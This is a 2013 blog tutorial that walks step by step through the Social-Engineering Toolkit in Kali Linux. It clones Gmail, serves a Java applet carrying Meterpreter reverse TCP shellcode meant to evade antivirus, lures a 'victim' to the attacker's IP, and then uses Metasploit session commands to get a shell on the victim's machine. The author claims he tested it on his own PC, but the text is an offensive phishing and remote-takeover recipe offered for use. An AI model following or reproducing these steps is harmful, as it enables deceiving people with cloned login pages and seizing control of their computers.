Tuesday, September 3, 2013

Bypassing Antivirus using Multi Pyinjector Shell Code Injection

IN THIS TUTORIAL I HAVE HACKED MY OWN WINDOWS 8 PC..

WORKING PLATFORM : WINDOWS, LINUX, MAC

PREREQUEST : INSTALLED JAVA ON VICTIMS PC.

OPEN SET TOOLKIT:

APPLICATION > KALI LINUX > EXPLOITATION TOOLS > SOCIAL ENGINEERING TOOLKIT > SE-TOOLKIT



AFTER OPEN SET U SEE THAT.


LET'S CHOOSE NO "1" => SOCIAL-ENGINEERING ATTACKS


LET'S CHOOSE NO 2 => WEBSITE ATTACK VECTORS


SELECT OPTION 1 => JAVA APPLET ATTACK METHOD


LET'S CHOOSE OPTION 2 => SITE CLONER


SET NAT/PORT FORWARDING TO => "NO"


ENTER UR "IP-ADDRESS" HERE TO REVERSE CONNECTION


ENTER THE SITE WHICH U WANNA CLONE 
I AM USING GMAIL...


AFTER THAT THE TASK TO CHOOSE PAYLOAD JUST ENTER NO 16 => MULTIPYINJECTOR SHELLCODE INJECTION


CHOOSE 1 => WINDOW METERPRETER REVERSE TCP
CHOOSE PORT => 444 U CAN USE ANY PORT.


I AM CHOOSING TWO MORE PORTS SO THE SESSION OF HACKING IS BEING MORE POWERFUL..
I AM USING 444 AND 445 TWO MORE PORTS HERE.


NOW SELECT THE OPTION 6 => I'M FINISHED ADDING PAYLOAD.


YOU CAN SEE SOMETHING LIKE THIS.
IT STARTING THE PAYLOAD HANDLER AND WAITING FOR THE VICTIMS REPLY.




GIVE UR VICTIM UR IP ADDRESS MINE IS "192.168.152.132"
WHEN THE VICTIM PUT UR IP IN THEIR BROWSER HE/SHE GOT A JAVA POP UP.
WHEN HE/SHE RUN THIS APPLET THE MACHINE IS GONE HACKED.


NOW THE VICTIM HAS RUN UR APPLET IN HIS PC SO U GOT SOMETHING LIKE THIS.


AFTER THAT PUT A COMMAND IN THE SO YOU CAN GET THE SESSIONS U HAVE GOT FROM THE VICTIMS PC.

COMMAND :  sessions -l 


CHOOSE ANY SESSION OUT OF THERE USING THIS COMMAND = >  sessions -i ID
                    
                                                                  TYPE = >  shell 

TO GET THE SYSTEM..          
            

0 comments:

Post a Comment